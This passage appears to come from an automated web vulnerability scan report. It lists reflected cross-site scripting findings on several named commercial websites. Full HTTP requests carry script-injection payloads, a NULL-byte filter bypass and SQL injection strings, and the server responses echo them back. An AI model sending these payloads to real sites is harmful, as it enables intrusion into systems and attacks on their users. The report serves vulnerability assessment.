Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/orderhistory/orderstatus.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:52:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
et=Y; 90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7addkawSrSgAAETmf2gAAAAj
SCRIPT_URL: /account36360--><script>alert(1)</script>6c3f9b7fbac/orderhistory/orderstatus.jsp
SCRIPT_URI: https://www.territoryahead.com/account36360-->
...[SNIP]...

5.117. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/orderhistory/orderstatus.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 938be--><script>alert(1)</script>8fe3bc39588 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/orderhistory938be--><script>alert(1)</script>8fe3bc39588/orderstatus.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/orderhistory/orderstatus.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:52:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
4_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7tFtL6wSrSgAAEYWPr8AAAAU
SCRIPT_URL: /account/orderhistory938be--><script>alert(1)</script>8fe3bc39588/orderstatus.jsp
SCRIPT_URI: https://www.territoryahead.com/account/orderhistory938be-->
...[SNIP]...

5.118. https://www.territoryahead.com/jump.jsp ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E request parameter is copied into an HTML comment. The payload 22046--><script>alert(1)</script>0a045e66a8a was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:16:24 GMT
Server: Apache
ETag: "AAAAS7ub5Kb"
Last-Modified: Fri, 25 Mar 2011 19:13:32 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
%3Ealert%280x000045%29%3C%2Fscript%3E22046--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0a045e66a8a=&itemType=ErrorPage&itemID=1&'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a
Session ID: a-e7l_ipIG-e (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
itemType = ErrorPage
itemType = ErrorPage
&#39;&#x22;--&gt;&lt;/style&gt;&lt;/script&gt;&lt
...[SNIP]...

5.119. https://www.territoryahead.com/jump.jsp [itemID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 60a71--><script>alert(1)</script>23be3cee852 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:26:03 GMT
Server: Apache
ETag: "AAAAS7ucEGn"
Last-Modified: Fri, 25 Mar 2011 19:14:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38646


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...

JVM: tta06
Request: GET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=1&itemType=ErrorPage&path=1%2C2%2C195%2C241&itemType=ErrorPage&itemID=1&itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
itemID = -1 OR 17-7=1060a71--&gt;&lt;script&gt;alert&#x28;1&#x29;&lt;/script
...[SNIP]...

5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload de539--><script>alert(1)</script>eea1fdeeba0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:55 GMT
Server: Apache
ETag: "AAAAS7ucPZy"
Last-Modified: Fri, 25 Mar 2011 19:15:03 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38669


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
pt%3E=&itemID=1&de539--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea1fdeeba0=1&itemType=ErrorPage&itemType=ErrorPage&itemID=1&'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
&#39;&#x22;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;alert&#x28;0x000045&#x29;&lt;/script&
...[SNIP]...

5.121. https://www.territoryahead.com/jump.jsp [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the path request parameter is copied into an HTML comment. The payload 39c78--><script>alert(1)</script>ebbf84990a5 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 39875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
age&ruleID=18&itemID=-1+OR+17-7%3D10&path=1%2C2%2C195%2C24139c78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eebbf84990a5&itemType=CATEGORY&itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
ruleID = 18
ruleID = 18
itemID = 0
itemID = 0
itemID = -1 OR 17-7=10
itemID = -1 OR 17-7=10
itemType = Er
...[SNIP]...

5.122. https://www2.hbc.com/contactus/contact-us.asp [langid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.hbc.com
Path:   /contactus/contact-us.asp

Issue detail

The value of the langid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb17"><script>alert(1)</script>fb63dd7b86f was submitted in the langid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactus/contact-us.asp?langid=en3bb17"><script>alert(1)</script>fb63dd7b86f&src=hbc HTTP/1.1
Host: www2.hbc.com
Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10820
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQXCCBAB=JCAOOEFBMFHPBEJFEIFCGJCJ; secure; path=/
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 13:51:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<input type="hidden" name="iLanguage" value="en3bb17"><script>alert(1)</script>fb63dd7b86f"/>
...[SNIP]...

5.123. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e04df<script>alert(1)</script>f493791083e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Referer: http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:52 GMT
Expires: Thu, 31 Mar 2011 00:53:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACSCDSTQ=MIGLCKNBKFIFPCAGJMEPDNMN; path=/
X-Powered-By: ASP.NET
Content-Length: 969
Connection: keep-alive

<br>Error Description:No value given for one or more required parameters.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeA
...[SNIP]...
@syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '497205542', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e', @browserName = 'Default', @browserVersion = '0.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.
...[SNIP]...

5.124. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 874e8<script>alert(1)</script>5752105b959 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:41 GMT
Expires: Thu, 31 Mar 2011 00:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSAACDBD=IKLLEPEBBEOKMFMAJDBGEMOO; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152,
...[SNIP]...
@operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959', @segment = 'undefined'<br>
...[SNIP]...

5.125. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda83"-alert(1)-"46677506f9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:42:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

5.126. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ca6b"-alert(1)-"9110dd52ec7 was submitted in the Referer HTTP header. This input was echoed as 8ca6b"-alert(1)-"9110dd52ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU; mbox=session#1301080493266-271579#1301082422|check#true#1301080622; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:41:55 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22982


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id '(select 1 and row
...[SNIP]...

5.127. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3d5"-alert(1)-"2bfe3cee0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU
Referer: http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:15:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 21861


